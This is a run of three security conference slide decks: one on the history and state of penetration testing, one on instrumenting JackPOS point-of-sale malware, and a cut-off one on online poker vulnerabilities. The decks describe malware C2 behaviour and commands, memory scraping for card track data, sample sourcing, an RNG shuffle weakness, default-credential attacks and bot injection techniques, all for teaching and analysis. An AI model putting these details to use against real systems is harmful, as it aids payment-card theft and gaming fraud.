Contrary to implications in later slides, there ARE actually a handful of really smart
people doing pentests, writing books about pentests and teaching classes on
pentesting, who despite their certifications (or lack thereof) actually know WTF they
are doing.
Those are not the people I’m talking about.
This presentation picks on the other douchebags who call themselves pentesters. As
such, I plan to talk about what you (and I) can do to take the industry back from the
shameless charlatans who’ve almost been successful in giving the rest of us a bad
name.
Yours very sincerely,
-Taylor
5
Part 1
the pentest is dead
6
7
the pentest is dead
history of the pentest
pentesting goes mainstream
7
7
1.1
history of the pentest
8
9
the timeline
1970 - 1979
1980 - 1989
1990 - 1999
2000 - 2008
9
Captain Crunch, Vin Cerf, Blue Boxes, Catch-22
CCC, 414s, WarGames, LoD, MoD, CoDC, 2600,
Phrack, Morris worm, Mitnick v MIT/DEC, Poulsen, CERT
Sundevil, EFF, LOD vs MOD, Poulsen, Sneakers,
DEF CON, AOHell, Mitnick, The Net, Hackers, MP3,
RIAA, Back Orifice, L0pht, Melissa
ILOVEYOU, Dmitry Sklyarov, DMCA, Code Red,
Paris Hilton’s Sidekick, XSS, Storm Worm, Web2.x, AJAX
9
10
on semantics
we’re talking about “classic” [network-based]
penetration testing
we’re not talking about 0-day vulndev,
on-the-fly reversing, etc
(if that’s what you were looking for, you can skip
out to the bar now)
10
10
11
a brief history: the pentest
11
early pentesting was a black art
nobody saw the need; employees were trusted
information security was poorly understood,
except by the learned few
The Hacker Manifesto
by The Mentor
Improving the Security of Your Site by Breaking Into It
by Dan Farmer and Wietse Venema
11
12
the hacker manifesto
Says The Mentor, “I am a hacker, enter my world…”
Provides a voice that transforms a sub-culture:
“Yes, I am a criminal. My crime is that of curiosity. My crime is that
of judging people by what they say and think, not what they look
like. My crime is that of outsmarting you, something that you will
never forgive me for.”
12
12
13
“A young boy, with greasy blonde hair, sitting in a dark room. The
room is illuminated only by the luminescense [sic] of the C64's 40
character screen. Taking another long drag from his Benson and
Hedges cigarette, the weary system cracker telnets to the next
faceless ".mil" site on his hit list. "guest -- guest", "root -- root",
and "system -- manager" all fail. No matter. He has all night... he
pencils the host off of his list, and tiredly types in the next potential
victim…”
Courtesy of “Improving the Security of Your Site by Breaking Into it”
13
improving the security of
your site by breaking into it
13
14
more history
Sterling’s “The Cuckoo’s Egg” documents the discovery,
identification and eventual arrest of a cracker
We begin to research and recognize “cracker activity”
Bill Cheswick authors “An Evening with Berferd In Which a
Cracker is Lured, Endured and Studied”
While a student, Chris Klaus gives us Internet Scanner 1.x ;)
Cheswick and Bellovin author “Firewalls and Internet Security”
14
14
15
enough history, i thought
there were war stories?!
once upon a time…
pentest, circa 2000
public school system with sql server, public i/f, sa no passwd
thousands of vulns, top findings:
blank or weak passwords, poor architecture and perimeter defenses,
unpatched systems, open file shares, no formal security program or
awareness efforts
what grade would you like today?
15
15
16
other fun shit...
that used to work
IIS Unicode
Solaris TTYPROMPT
froot
blank passwords
‘sa’
Administrator
16
16
17
whitehats by day…
early on, true penetration testing skills were learned mostly in
and amongst small, underground communities
those who were good were often that way because their hat’s
weren’t always white
18
17
18
early methodologies
when i began performing penetration tests professionally, there
was no semblance of a commonly-accepted methodology, so
i wrote my own
in fact, i wrote methodologies used successfully by three
companies based entirely on my own early experiences
in late 2000, pete herzog (ideahamster) released the first
version of the open source security testing methodology
manual (the OSSTMM - like awesome with a T in the middle)
19
18
19
osstmm v1.x
the earliest editions of the osstmm were helpful, and showed
promise, but had a long way to go before they would replace
my own hand-written process/procedure documentation
even still, the effort was laudable, as no other similar effort of
any significance otherwise existed
20
19
20
a service in search of a
methodology
the real problem with a generally-accepted methodology,
however, was rooted in ruthless competition
in 2001 there was a lot of money in pentesting, and a lot of
competition for the mid and large enterprise
in other words, it was “job security through process obscurity”
if you were good at what you did, as long as nobody else
could produce as thorough results with as effective
remediation recommendations, you won ;)
21
20
21
a stain on your practice
unfortunately, “job security through process obscurity”
ultimately hurt us all, as not only were no two pentests alike,
but they were often so radically different that no one could feel
confident or secure with only a single organization’s results
and if it ain’t repeatable, it ain’t a pentest… it’s just a hack
thus it was time to embrace the osstmm to help ensure a
basic set of best practices, necessary processes, and general
business ethics that anyone worth their salt should possess
22
21
22
progress?
ISACA
ISECOM
CHECK
OWASP
ISAAF
NSA
TIGERSCHEME
23
22
so where does
pentesting fit?
we don’t know, but pentesting is cool!
(more on this later)
23
1.2
pentesting goes mainstream
24
25
pentesting goes
mainstream
by 2000, pentesting began to gain more widespread appeal
assessment tools have come a long way since then
(hell, even portscanners used to be a pain in the ass)
their effectiveness, efficiency and ease of use have improved:
take nmap, superscanner, nessus, caine/abel, metasploit
with easier and more readily available tools, more practitioners
emerge, though most lack both experience and methodology
26
25
26
hacking in the movies
WarGames
Sneakers
Hackers
The Matrix
Swordfish
Antitrust
Takedown
27
26
27
the lunatics have taken
over the asylum!
you better get used to it
in this segment of this industry, you’ll likely compete with idiots
why? because there are thousands of people who mistakenly
believe they’re good hackers (this audience of course excluded ;)
unfortunately, although ego is often a by-product of a good
hacker (or maybe even a factor of?), i can guarantee that ego
alone does not a good hacker make
28
27
28
so how did i become a
pentester then?
With Internet texts and a series of good mentors :)
The Rainbow Series, always a good place to start
“Smashing the Stack for Fun and Profit” by Aleph One
“How to Become a Hacker” by ESR
IRC and underground websites
(just take everything with a grain of salt)
understanding the process of an attack; not just the tools and the
vulns… but the actual mindset one must achieve to circumvent
29
28
29
hacking training:
the good, the bad, the ugly
30
Early on (pre-2000), your choices were few, but the education
was generally good
Good, but not great
For the most part, we were teaching tools with a basic
[prescribed] formula for using those tools to explore common
network security deficiencies
But we weren’t teaching a methodology, because:
It was difficult to teach someone to “think like a hacker” in only 5 days
A good (and commonly accepted) methodology didn’t yet exist
29
30
hacking training continued
Unfortunately, nowadays, there are a zillion companies who
will teach you “applied hacking,” “penetration testing,” “ethical
hacking,” and other such crap
Few of them actually know what they’re doing
Most are “certified” but lack real experience.
They’ll teach you nmap and offer you 80 hours of “bootcamp-style”
rhetoric, but they can’t teach you to be a good pentester.
(In fact, of the dozen or so “C|EH instructors” I’ve met, only 3 had
ever actually performed a penetration test for hire. OMGWTF?)
31
30
31
hacking books
Hacking Exposed. Good book, set the bar pretty high.
Nonetheless, a million other “hacking books” followed, and as
with “hacking training,” many (most) of them sucked.
I have at least a dozen crappy books that are basically re-worked
re-writes of each other… teaching the same old tools in the
same old way, with the same old screenshots.
A few notable exceptions: shellcoders handbook, hacking: the
art of exploitation, grayhat hacking, google hacking for
pentesters
32
31
32
hacking certifications
No, seriously, are you really proud of that?
All certifications, given time, become worthless due to brain dumps and
study guides.
Assuming they weren’t worthless to begin with.
Does a tool-based class & tool-based cert really prove your skill-set?
I posit that “certified hacker” is almost as good as a note from your mom (but
not quite). Who exactly is really qualified to certify a hacker?
I’ve never seen a test, multiple choice or otherwise, that could even hope
to identify a good hacker. Especially one with an 80% pass-rate at the
conclusion of a 5-day class. Get real.
33
32
33
apologies
Yeah, yeah, ok.
I’m sorry to those of you who do actually know what you’re
doing. You are the notable few, you’re smarter than your
peers, you’re a dying breed, blah blah blah. (remember my
disclaimer?)
The rest of you know who you are. If your face turned beet red
during that last slide, you’re probably one of the people who
thinks that a “hacking instructor certification” makes you an
expert. Do you seriously believe that crap?
34
33
34
on regurgitation
i’ve heard “war stories” about pentests that i performed told by
more than a handful of other “hacking instructors” (many of whom
attended my classes) across the course of the past several years
if i ever catch you using one of my stories, i can assure you that i
will make every effort to ridicule and humiliate you, publicly ;)
35
34
35
“scan now” pentests
from the “scan now” button in internet scanner
clients get a report with thousands of vulnerabilities with subjective risk
ratings
does not account for the environment, network architecture or asset
value
little guidance, no strategy, limited value
many of the “pentests” currently being delivered are little more than
“scan now” tests; they are ultimately in-depth vulnerability scans
that produce thousands of pages of worthless results
36
35
36
bottom line:
it’s not about the tools!
37
36
37
another story. goody.
pentest for a banker’s bank (that’s a bank that provides services only
to other banks)
external pentest was helpful, but not revelatory
onsite pentest, however, revealed:
several oddly named accounts on an internal webserver; after two hours of
password cracking, only a non-admin password was revealed.
heartbroken, i continued on.
20 minutes and about three guesses later, variations on my non-admin
password gave me admin access to:
domain controllers, dns servers, core routers, and firewalls. game over
38
37
38
conclusion: why yesterday’s
pentest is worthless
39
security is a process, not a project
lacking a methodology
no two tests are alike
early pentests were very adhoc
pentesting goes mainstream
hacking in the movies
books, classes and certifications
38
Part 2
long live the pentest!
39
40
long live the pentest!
the value of the pentest
evolution of the pentest
a framework for repeatable testing
41
40
2.1
the value of the pentest
41
42
where does pentesting fit?
“penetration testing is a dead-end service line, as more and
more tasks can be automated”
but is a pentest really just a series of tasks?
“secure coding eliminates the need for pentesting”
pie in the sky?
if everyone were honest, there’d be no more crime
of course, this also overlooks many other more fundamental
problems in the information security world
43
42
43
so pentesting isn’t quite
dead yet
we say: “no, not yet”
current level of automation amounts to little more than automated
vulnerability scanning
as we said before, a pentest is much more than just a vulnscan!
44
43
44
remember that time…
Client with AS400 and Windows
45
44
45
assessing the value of a
modern-day pentest
is secure coding a realistic future?
the state of software flaws
the value of third-party review
oracle / litchfield paradigm
challenge issued, accepted and met
not the only example - “pwn to own”
46
45
46
“we aren’t conducting a
penetration test, we’re…”
“...creating compelling events,” says marty sells (iss)
it makes for a nice pop-quiz to see if current hacker tools and techniques can
bypass deployed countermeasures
ofir arkin’s paper on bypassing NAC or using VLAN hopping to monitor “isolated”
segments
recent research by Brad Antoniewicz and Josh Wright in wireless security expose
problems in common implementations of WPA Enterprise
the point being, smart people can find unexpected/unforeseen issues that may not be
common knowledge, so they would not be accounted for in any security initiatives
pentesting might even improve awareness!
47
46
47
getting funding for
infosec initiatives
database tables for a slot machine operation
doctors doing the Heisman pose
48
47
2.2
evolution of the pentest
48
49
what kind of things do we
find today?
weak passwords
poor architecture
missing patches
system defaults
poorly configured vendor devices
yep, we’re talking about that printer/scanner/fax!
50
49
50
the funny thing is
these are the same damn things we were finding 10+ years
ago!
so have we really learned?
is software measurably more secure?
is network architecture that much better?
has anybody listened to anything we’ve been saying?
(not a damn thing, apparently!)
51
50
51
an ongoing process
remember the iss addme model?
assess
design
deploy
manage
educate
(rinse and repeat)
52
51
52
a repeatable process!
pentests of lore were often quite ad-hoc
unfortunately, with no continuity between tests, it’s difficult if not
impossible to effectively determine if things are improving
believe it or not, process and (thank god there are no shmooballs
at this con) metrics are actually quite important here
53
52
53
a systematic approach to
security management
ok, so let’s compare:
yesterday’s pentest:
“here’s your 1300 page report from internet scanner^H^H^H^H^H,
errr… that we custom generated, just for you!”
“risk profile? what do you mean?”
54
53
54
a systematic approach to
security management
current pentest
action plan matrix to deal with highest impact / lowest cost
first
(still no accepted standard for determining risk profile
improvements)
systems that just count vulns don’t take into account the #
of vulns announced last week, last month, etc.
we need an ever better system of metrics here
55
54
55
the metrics reloaded
optimally, a good metric would account for
number of vulns discovered, over time
number of vulns by platform, over time
mean time for remediation
and follow-up testing would ensure
follow-up pentest
assessment of effectiveness of deployed countermeasures
56
55
56
invariably variable
a pentest is still always influenced by the individual pentester’s
experience and background
again, this reinforces the understanding that simple vuln
counting is ineffective
for new findings across a systematic rescan
were these actual new findings? were they missed previously?
did the tools improve? was there a new team? did the team improve?
57
56
57
hammer time.
2006 pentest with “partial control”
2007 follow-up
how complex are the metrics required to explain this situation?
58
57
58
upgrades to the toolbox
nmap still reigns king (go see fyodor’s talk!)
superscanner
john the ripper
rainbow tables
cain and abel
metasploit, holy shit
59
58
59
upgrades to the toolbox
vulnerability scan^H^H^H^H management
nessus
foundstone
iss
ncircle
tenable
60
59
60
upgrades to the toolbox
wireless
high-powered pcmcia and usb cards (alfa!)
aircrack-ng
kismet, kismac
asleap
cowpatty (omgwtf, saw bregenzer’s talk?)
61
60
61
upgrades to the toolbox
live distros and other misc
backtrack (one pentest distro to rule them all)
damn vulnerable linux
winpe (haha, no just kidding, omg)
62
61
2.3
a framework for repeatable testing
62
63
improved methodologies
isecom’s osstmm now at v2.2, with 3.0 eminent
(and available to paying subscribers)
the open information systems security group is now proffering the issaf, the
information systems security assessment framework
kevin orrey (vulnerabilityassessment.co.uk) offers his penetration testing
framework v0.5
nist special publication 800-42 provides guidelines on network security
testing
wirelessdefence.org offers a wireless penetration testing framework, now
part of kevin orrey’s full pentesting framework, above
64
63
64
…forest for the trees
early pentests were little more than exhaustive enumerations of all
[known] vulnerabilities, occasionally with documentation on the
process by which to most effectively exploit them
with time, networks grew geometrically more complex, rendering mere
vulnerability enumeration all but useless
we now have to focus on architectural flaws and systemic issues in
addition to vulnerability enumeration
methodologies can be very helpful, but don’t obviate the need for
original thought. in other words, neither a cert nor a methodology can
make you a good pentester if you don’t already think like a hacker.
65
64
65
tactical vs strategic
the [old] tactical approach
identify all vulnerabilities [known by your automated scanner], rate
their risk as high, medium or low, then dump them into a client’s
lap and haul ass
the [new] strategic approach
identify all known vulnerabilities, including architectural and
conceptual, correlate them within the context of the company’s
risk (subject to available risk tolerance data) then assist in creating
an action plan to calculate risk vs effort required to remediate
66
65
66
embrace the strategic
strategic penetration testing therefore requires
a skilled individual or team with sufficient background (and a hacker-like
mindset, not just a certification), capable of creatively interpreting and
implementing a framework or methodology
a scoring system that factors in things like
system criticality
complexity and/or likelihood of attack
complexity and/or effort involved in remediation
effective metrics!
67
66
67
how providers are chosen
i’ll choose these guys if it’s compliance and i don’t want
anything found,
or… these other guys if i actually want to know what the hell is
going on and don’t want to get pwned later
many companies also now have internal “tiger teams” for
pentesting
while a good idea, third party validation is both important and
necessary; remember our comments on different backgrounds
and experience?
68
67
Part 2.4
pentesting in the 21st century…
and beyond
68
69
why we need an organic
[open] methodology
working with what we have
no point trying to reinvent the wheel
already have a methodology of your own? map, correlate and contribute it!
improvement of standardized methodologies only happens through
contributions
osstmm and issaf stand out as most complete
osstmm has been around longer, but both have wide body of contributors
moderate overlap, so review of both recommended
70
69
70
contributing to open
methodologies
osstmm and issaf will continue to improve
fueled by contributions
need continuous review
difficult to measure the effectiveness of any one framework,
but they can be evaluated against each other in terms of
thoroughness and accuracy
bottom line: not using a framework or methodology (at least in
part) will almost certainly place you at a disadvantage
71
70
71
adapting to new
technologies
so how does one keep up with the ever changing threat / vulnerability
landscape? what about wpa, nac, web2.0 and beyond? (which way
did he go, george?)
simple answer -- be dan kaminsky or billy hoffman, or:
new technology does not necessarily imply old threats, vulnerabilities,
attacks and solutions won’t still work
want to pentest a new technology, but not sure where to begin, which tools
to use?
do what smart developers do, threat/attack models!
(see bruce scneier, windows snyder, adam shostack, et. al.)
72
71
72
can you test without a
baseline?
absolutely! (though you might have a hard time quantifying and/
or measuring risks associated with discovered flaws)
then identify data flows, data stores, processes, interactors and trust
boundaries
in other words, find the data, determine how the data is modified and by
what/whom, figure out how and where the data extends and attack as
many pieces of this puzzle as your existing beachhead allows!
if it’s a piece of software running on a computer, it’s ultimately vulnerable…
somewhere
73
72
73
threat/attack modeling
several different approaches, but all focus on the same basic set of tasks
and objectives
msft says: identify security objectives, survey application, decompose
application, identify, understand and categorize threats, identify vulnerabilities,
[identify mitigation strategies, test]
wikipedia: identify [business objectives, user roles, data, use cases]; model
[components, service roles, dependencies]; identify threats to cia; assign risk
values; determine countermeasures
although threat models are useful for securing software, at a more
abstract level, they are also extremely useful for compromising new and/
or untested technologies
74
73
74
quality assurance
so can we define qa and/or qc in the context of penetration testing?
sure, it’s basically an elaboration on our previously mentioned set of
necessary / desired metrics
# of vulns discovered over time, # discovered by platform, mean time
for remediation and potential for mitigation by means of available
countermeasures. further, apply richard bejtlich’s five components used
to judge a threat: existence, capability, history, intentions, and targeting
these metrics are then mapped back to assets against which individual
vulnerabilities were identified and you have a quantifiable and quantitative
analysis of a penetration test
75
74
75
hacker insurance?
often dubbed “network risk insurance”
$5k - $30k/ year for $1m coverage
is it worth it? should you be recommending it?
well, that’s quite subjective. how good was your pentest? ;)
depends on the organization, the nature of the information they purvey, their potential
for loss, etc. in general, i say absolutely!
providers include aig, lloyd’s of london / hiscox, chubb, zurich north america,
insuretrust, arden financial, marsh, st. paul, tennant
unless you can “guarantee” your pentest by offering your client a money-back
guarantee, suggesting hacker insurance might be a wise idea
76
75
76
Conclusions
1 the pentest is dead
2 long live the pentest
2.3 a framework for repeatable testing
2.4 pentesting in the 21st century and beyond
Until next time...
77
76
End.
everything we said might be a lie
thanks for hearing us out,
-taylor and carric
77 | pdf |
Wesley McGrew
Assistant Research Professor
Mississippi State University
Department of Computer Science & Engineering
Distributed Analytics and Security Institute
Instrumenting Point-of-Sale
Malware
A Case Study in Communicating Malware Analysis More Effectively
Introduction
• The pragmatic and unapologetic offensive security guy
• Breaking things
• Reversing things
• Mississippi State University - NSA CAE Cyber Ops
• Enjoying my fourth year speaking at DEF CON
The Plan
• In general:
• Adopt better practices in describing and demonstrating
malware capabilities
• Proposal to supplement written analyses with illustration
that uses the malware itself
• What we’ll spend a good chunk of today’s session doing:
• Showing off some cool instrumented POS malware
• Talk about how you can do the same
Scientific Method
(the really important bits)
• Reproducibility
• Reasons:
• Verifying results
• Starting new analysis where old analysis left off
• Education of new reverse engineering specialists
• IOC consumers vs. fellow analysts as an audience
What’s often missing?
• Sample info
• Hashes
• Availability
• Procedure
• Subverting malware-
specific
countermeasures
• Context
• Redacted info on
compromised hosts
and C2 hosts
• Internal points of
reference
• Addresses of
functionality/data being
discussed
Devil’s Advocate:
Why it’s not there…
• Fellow analysts and students are not the target audience of many published
analyses
• We’re left to “pick” through for technically useful info
• Added effort - It’s a lot of work to get your internal notes and tools fit for outside
consumption
• Analysis-consumer safety - preventing the reader for inadvertently infecting
• Client confidentiality - Compelling. May be client-specific data in targeted malware
• Competitive advantage - public relations, advertising services, showcase of
technical ability
• Perhaps not in our best interest to allow someone to further it, do it better, or
worse: prove it wrong.
What’s Being Done
Elsewhere?
• Reproducibility and verifiability are a big deal in any academic/scientific
endeavor
• Peer review is supposed to act as the filter here
• (Though maybe we aren’t as rigorous as we ought to be with it in
computer science/engineering)
• Software, environment, data, documented to the point that someone can
recreate the experiment
• Executable/interactive research paper
• Embedded algorithms and data,
• (Doesn’t that sound a bit scary re: Malware? :) )
Recommendations
• Beyond sandbox output…
• Sample availability (!!!!!!!!!)
• virusshare.com is the best positive example of the right direction here
• Host environment documentation
• Target data - give it something to exfiltrate
• Network environment - give it what it wants to talk to
• Instrumentation - programmatic, running commentary
• Scriptable debugging (winappdbg!)
• Isolate functionality, document points of interest, put it all into a big picture
Case Study:
JackPOS
Acknowledgements
• Samples - @xylit0l - http://cybercrime-tracker.net
• Prior-to-now-but-post-this-work analyses
• http://blog.spiderlabs.com/2014/02/jackpos-the-
house-always-wins.html
• http://blog.malwaremustdie.org/2014/02/cyber-
intelligence-jackpos-behind-screen.html
• Please check the white paper citations for tools,
executable paper prior work, etc.
(to make sure I get these in before we geek-out on the demo)
Why JackPOS?
• Current concern surrounding POS malware
• C2 availability - Ability to demonstrate a complete
environment
• From card-swipe to command-and-control
• C++ strings, STL - runtime objects make static analysis with
IDA Pro a bit more awkward
• Good use case for harnesses
• Independent memory-search functionality
Harness Design
• WinAppDbg - Python scriptable debugging
• Really fun library - Well-documented, lots of
examples, easy to use
• Callbacks for breakpoints
JackPOS
• Example sample - SHA1
9fa9364add245ce873552aced7b4a757dceceb9e
• Available on virusshare (and mcgrewsecurity.com)
• This is the only part not on the DEF CON DVD.
• Command and Control
• PHP, Yii Framework
Command and Control
• Data model - bots, cards, commands, dumps,
ranges, tracks, users
Back to the sample
• UPX (thankfully not an unpacking talk/tutorial)
• Unpacked version crashes due the stack cookie seed
address not relocating
• Easy fix: disable ASLR (also makes our analysis
easier), unset:
• IMAGE_NT_HEADERS >
IMAGE_OPTIONAL_HEADER >
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
Setup
• String setup - c2, executable filenames,
process names for memory search
• Installation (copying self)/persistence (registry)
• Harness patches -
• Command and control
• Installation check
• Prevents watchdog process
(and anything else from ShellExecute’ing)
Communication
• Command and Control Check-in
• Checks C2 for http://[c2]/post_echo
• (PostController.php responds “up”)
• Prevents simple sandbox from getting much
• If there’s track data, base64 it and send it
• Harness configured to display data sent
• Check command queue
• Hosts uniquely identify by MAC
Commands
• Credit card track theft happens without having to be
commanded to do so
• Remainder of command set is simple:
• kill
• update - (replace current install with latest from
/post/download)
• exec <url>
Scraping Memory
• Get a list of functions
• No 64-bit process
• No processes matching internal table
(system, etc)
• Iterate and search for card data using two
regular-expression-esque functions
• ISO/IEC 7813 (we can generate and instrument this)
• Harness identifies search process
• Another harness can be used to instrument
the code to scan arbitrary PIDs
Demo
• Sample MD5 - aa9686c3161242ba61b779aa325e9d24
• Harnesses
• jackpos_harness.py - Instruments all operation
• search_proc_harness.py - Skips to and illustrates track-data
capture
• Track data generator - Generate and hold card swipes in memory
• PHP source for (actual) C2
• (recreated DB schema (uh it works))
Wrapping up
• Addressing reproducibility/verifiability, potential benefits
• Effective illustration for lay audiences, students
• Base to work from (not “from scratch”) for other analysts
• Illustration using the resources malware “wants”, vs.
generic sandbox
• Potential for publishing instrumented analysis in virtual/
cloud environments for others to work with more
immediately
Contact Info
!
[email protected]
@McGrewSecurity | pdf |
Getting F***** on the River
Gus Fritschie and Steve Witmer
with help from
Mike Wright, and JD Durick
August 6, 2011
Presentation Overview
Preflop
Who We Are
What is Online Poker
Online Poker History
Current Events
Flop
Past Vulnerabilities
RNG
SuperUser
SSL
Account Compromise
Poker Bots
Turn
Online Poker Architecture
Poker Client=Rootkit
Web Application Vulnerabilities
Authentication Vulnerabilities
Attacking Supporting
Infrastructure
River
Defenses – Application
Defenses – User
Next Steps in Research
Conclusion
Questions
© SeNet International Corp. 2011
3
August 2011
SeNet
Preflop
© SeNet International Corp. 2011
4
August 2011
SeNet
Who We Are – SeNet International
SeNet International is a Small Business Founded in 1998 to Deliver Network and
Information Security Consulting Services to Government and Commercial Clients
•
High-End Consulting Services Focus:
Government Certification and Accreditation Support
Network Integration
Security Compliance Verification and Validation
Security Program Development with Business Case Justifications
Complex Security Designs and Optimized Deployments
•
Proven Solution Delivery Methodology:
Contract Execution Framework for Consistency and Quality
Technical, Management, and Quality Assurance Components
•
Exceptional Qualifications:
Executive Team—Security Industry Reputation and Active Project Leadership
Expertise with Leading Security Product Vendors, Technologies, and Best Practices
Advanced Degrees, Proper Clearances, Standards Organization Memberships, and IT Certifications
•
Corporate Resources:
Located in Fairfax, Virginia
Fully Equipped Security Lab
Over 40 full time security professionals
© SeNet International Corp. 2011
5
August 2011
SeNet
Who We Are – Gus Fritschie
CTO of a security
consulting firm based
in the DC metro area.
Enjoys penetrating
government
networks (with their
permission), playing
golf (business
development) and
teaching my
daughter to gamble.
© SeNet International Corp. 2011
6
August 2011
SeNet
Who We Are – Steve Witmer
Prior to his current job, Steve
spent 5 years as a road warrior
working for clients all over the
world ranging from Fortune 500 to
churches and delivering any kind
of engagement a client would pay
for: aka, a security whore.
Sr. Security Analyst in
the Northern Virginia
area working for a
small company
supporting
government contracts.
Responsible for
conducting application
assessments,
penetration testing,
secure configuration
reviews, NIST
C&A/ST&E and other
security mumbo-
jumbo. He enjoys
scuba diving and big
speakers.
© SeNet International Corp. 2011
7
August 2011
SeNet
Who We Are – Mike Wright
Contractor for the United States Coast
Guard (blame them for not seeing my
pretty face tonight) and security consultant.
Hobbies include the broad spectrum of
Information Technology, but more geared
towards security and hacking around.
Currently trying to bleach my hat white but
still seeing shades of gray…
© SeNet International Corp. 2011
8
August 2011
SeNet
Who We Are – JD Durick
Experience as a software engineer,
network security consultant,
INFOSEC engineer, and digital
forensic examiner for the past 15
years.
Digital forensics
examiner in the
northern Virginia area
working for a large
defense contractor.
Responsible for
conducting network
forensics as well as
hard drive and malware
analysis on network-
based intrusions
involving commercial
and government
computer systems.
© SeNet International Corp. 2011
9
August 2011
SeNet
What is Online Poker
© SeNet International Corp. 2011
10
August 2011
SeNet
Online Poker Timeline
•Early 90’s – IRC Poker is the 1st Virtual Poker
•1998 – Planet Poker Launched, 1st Real Money Site
•1999 – Kahnawake Gaming Commission Regulations
•2000 – UB Launches
•2001 – Party Poker and Poker Stars
•2003 – Moneymaker and Poker Boom
•2004 – Full Tilt Poker
•2005 – Online Poker Becomes $2 Billion Industry
•2006 – UIGEA
•2007 – UB/AP Cheating Scandal
•2010 – Online Poker Industry Reaches $6 Billion
•2011 – 4/15 Black Friday
© SeNet International Corp. 2011
11
August 2011
SeNet
Online Poker Current Events
• DOJ has seized the
following poker sites on
charges of illegal gambling
and money laundering:
Poker Stars, Full Tilt,
UB/Absolute, and
Doyles Room
• Poker Stars has paid
players, not other site has.
• Development of new
features and functionality
seems to be in a holding
pattern.
© SeNet International Corp. 2011
12
August 2011
SeNet
Online Poker Revenue
© SeNet International Corp. 2011
13
August 2011
SeNet
Online Poker Revenue (Cont.)
In other words there is a lot of money in online poker
© SeNet International Corp. 2011
14
August 2011
SeNet
Regulation\Compliance
•
For an industry that makes a decent amount of revenue there
is little to no regulation\compliance
•
Isle of Man Gambling Supervision Commission and Kahnawake
Gaming Commission
•
Party Poker and other sites do not allow players from the USA
and in certain countries (i.e. UK) it is regulated and taxed.
“Licensed and regulated by the Government of Gibraltar, our games are powered
by the bwin.party systems which are independently tested to ensure that our
games operate correctly, are fair, their outcomes are not predictable and that
the system is reliable, resilient and otherwise up to the highest standards of
software integrity, including access control, change control recording,
fingerprinting of the executables and regular monitoring of all critical
components of our systems.”
© SeNet International Corp. 2011
15
August 2011
SeNet
Regulation\Compliance (Cont.)
There is a need for
compliance related
activities if online poker is
to become regulated and
safe to play in the USA.
A standard needs to be
developed and companies
that provide these services
need to be audited. Not
just from the financial
perspective, but the
technical perspective.
Why will this happen?
© SeNet International Corp. 2011
16
August 2011
SeNet
Regulation\Compliance (Cont.)
Because there is a lot of money in online poker
© SeNet International Corp. 2011
17
August 2011
SeNet
Flop
© SeNet International Corp. 2011
18
August 2011
SeNet
Past Vulnerabilities
•
Random Number Generator Vulnerability
•
UB/Absolute Super User Issue
•
SSL Exploit
•
Misc. Account Compromise
•
Poker Bots
© SeNet International Corp. 2011
19
August 2011
SeNet
Random Number Generator
Vulnerability
•
Documented in 1999 and originally published in
Developer.com
•
PlanetPoker had published their shuffling algorithm to
demonstrate the game’s integrity
•
ASF Software developed the shuffling algorithm
© SeNet International Corp. 2011
20
August 2011
SeNet
Random Number Generator
Vulnerability (Cont.)
•
In a real deck of cards, there are 52! (approximately 2^226)
possible unique shuffles.
•
In their algorithm only 4 billion possible shuffles can result from this
algorithm
•
Seed for the random number generator using the Pascal function
Randomize()
•
Number reduces to 86,400,000
•
They were able to reduce the number of possible combinations
down to a number on the order of 200,000 possibilities
•
Based on the five known cards their program searched through the
few hundred thousand possible shuffles to determine the correct
one
© SeNet International Corp. 2011
21
August 2011
SeNet
Random Number Generator
Vulnerability (Cont.)
•
These days companies have their RNG audited by reputable 3rd
parties
•
From Poker Stars site: “Cigital, the largest consulting firm specializing in
software security and quality, has confirmed the reliability and security of the
random number generator (RNG) that PokerStars uses to shuffle cards on its
online poker site, showing the solution meets or exceeds best practices in
generating unpredictable and statistically random values for dealing cards.”
•
Do you believe this?
© SeNet International Corp. 2011
22
August 2011
SeNet
UB/Absolute Super User Issue
•
Full story is almost like a soap opera.
•
Cheating is thought to have occurred between 2004-2008
when members of online poker forum began investigating.
•
Still actively being investigated by people such as Haley
(http://haleyspokerblog.blogspot.com/).
© SeNet International Corp. 2011
23
August 2011
SeNet
UB/Absolute Super User Issue (Cont.)
• Story is owner suspected cheating and asked software
developer to put in a tool to “help catch the cheaters”
• Hired an independent contractor to put in a tool which
became known as “god mode”
• God Mode worked like this: the tool couldn’t be used on
the same computer that someone was using. Someone
else would need to log into UB and turn the tool on.
That person could then see all hole cards on the site–
and then feed the information.
• 23 accounts. 117 usernames. $22 million dollars
© SeNet International Corp. 2011
24
August 2011
SeNet
UB/Absolute Super User Issue (Cont.)
© SeNet International Corp. 2011
25
August 2011
SeNet
UB/Absolute Super User Issue (Cont.)
• Lessons learned:
• Configuration Management
• Separation of Duties
• Code Reviews
• SDLC
• Auditing
© SeNet International Corp. 2011
26
August 2011
SeNet
SSL Exploit
Discovered by Poker Table
Ratings in May 2010.
Why use SSL when you can
just XOR it…….
Fixed 11 days later (hard to
implement SSL)
UB/Absolute and Cake
network were vulnerable
© SeNet International Corp. 2011
27
August 2011
SeNet
Misc. Account Compromise
© SeNet International Corp. 2011
28
August 2011
SeNet
Poker Bots
•
Poker bots are not new, but until recently they were not very good.
•
Artificial intelligence has come a long way in the last few years.
•
Chess bot vs. poker bot
•
http://www.codingthewheel.com/archives/how-i-built-a-working-
poker-bot
•
http://bonusbots.com/
© SeNet International Corp. 2011
29
August 2011
SeNet
Poker Bots (Cont.)
•
Windowing & GDI
•
Windows Hooks
•
Kernel objects
•
DLL Injection (in general:
the injecting of code into
other processes)
•
API Instrumentation (via
Detours or similar libraries)
•
Inter-process
Communication (IPC)
•
Multithreading &
synchronization
•
Simulating user input
•
Regular expressions
(probably through Boost)
•
Spy++
© SeNet International Corp. 2011
30
August 2011
SeNet
Poker Bots (Cont.)
•
Poker Sites have been cracking down on bots
•
How do they catch them:
•
Betting patterns
•
Tendency
•
Program Flaws (always click same pixel)
•
Scanning
•
When a player is identified as a bot, Full Tilt or PokerStars removes them
from our games as soon as possible.” Their winnings are confiscated, he
said, and the company will “provide compensation to players when
appropriate.”
© SeNet International Corp. 2011
31
August 2011
SeNet
Poker Bots (Cont.)
•
Full Tilt – Banned after finding evidence of a poker bot on your hard drive:
On Sat, Oct 16, 2010 at 2:03 PM, Full Tilt Poker - Security
<[email protected]> wrote:
Hello <#FAIL>,
As outlined in the email you received, you have been found guilty of a violation
of our rules regarding the use of prohibited software. Specifically you have been
found to have used the Shanky Technologies Bot. The email you were sent has
